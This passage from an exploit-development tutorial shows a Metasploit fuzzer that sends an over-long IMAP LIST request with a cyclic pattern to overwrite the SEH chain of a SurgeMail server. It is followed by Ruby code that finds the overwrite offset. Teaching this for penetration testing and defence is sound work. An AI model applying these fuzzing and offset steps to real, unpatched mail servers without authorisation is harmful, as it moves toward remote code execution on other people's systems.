Chapter 14

Figure 14-2: The overwritten SEH entry

Now that you know that you can control the SEH chain on the vulnerable surgemail process with an overly long buffer, it's time to determine the exact length required to overwrite it on the target. As you will recall from our discussions of stand-alone exploit development, before you can use a return address, you first need to find out where, exactly, the overwrite occurs.

We can modify our fuzzer code to create a nonrepeating, random string of characters of a specific length, as shown next:

  print_status("Generating fuzzed data...")
  fuzzed = Rex::Text.pattern_create(11000)
  print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
  req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"

In this listing, we use Rex::Text.pattern_create to generate the nonrepeating random string of characters with our fuzzer. Rerunning the fuzzer module now shows that SEH was overwritten on the target with 684E3368, as shown in Figure 14-3.

Figure 14-3: The SEH overwritten with random characters
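To show why the pattern makes the overwrite position recoverable from a single debugger value, here is an added, stand-alone re-implementation of the cyclic pattern that Rex::Text.pattern_create emits with its default character sets, together with the reverse lookup that pattern_offset performs. It is not the book's code and not Rex itself; it assumes a little-endian x86 target and needs only a stock Ruby interpreter.

```ruby
# Added example, not from the book: Rex-style cyclic pattern and offset lookup.
UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Build a non-repeating pattern of +length+ bytes. Each 3-byte unit is
# Upper+Lower+Digit with the digit cycling fastest ("Aa0Aa1...Aa9Ab0..."),
# so every 4-byte window is unique within one period of 26*26*10*3 = 20280
# bytes, which is why a single overwritten register pins down the offset.
def pattern_create(length)
  buf = +''
  k = 0
  while buf.length < length
    buf << UPPER[k / 260] << LOWER[(k / 10) % 26] << DIGIT[k % 10]
    k += 1
  end
  buf[0, length]
end

# Turn a register value as the debugger displays it (e.g. "684E3368") into
# the 4 bytes that sat in memory on a little-endian target: "h3Nh".
def dword_to_bytes(hex)
  [hex].pack('H*').reverse
end

# Report where those 4 bytes land in a pattern of +length+ bytes, or nil if
# the value did not come from the pattern at all (e.g. "41414141").
# The little-endian reading is tried first, then the raw byte order.
def pattern_offset(hex, length)
  pat = pattern_create(length)
  [dword_to_bytes(hex), [hex].pack('H*')].each do |needle|
    idx = pat.index(needle)
    return idx if idx
  end
  nil
end

if __FILE__ == $0
  puts pattern_create(30)                  # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
  puts pattern_offset('684E3368', 11000)   # offset of "h3Nh" in an 11000-byte pattern
end
```

The lookup returns the number of bytes that precede the four that landed in the SEH handler slot, which is the value the exploit later needs in order to place a chosen address there instead.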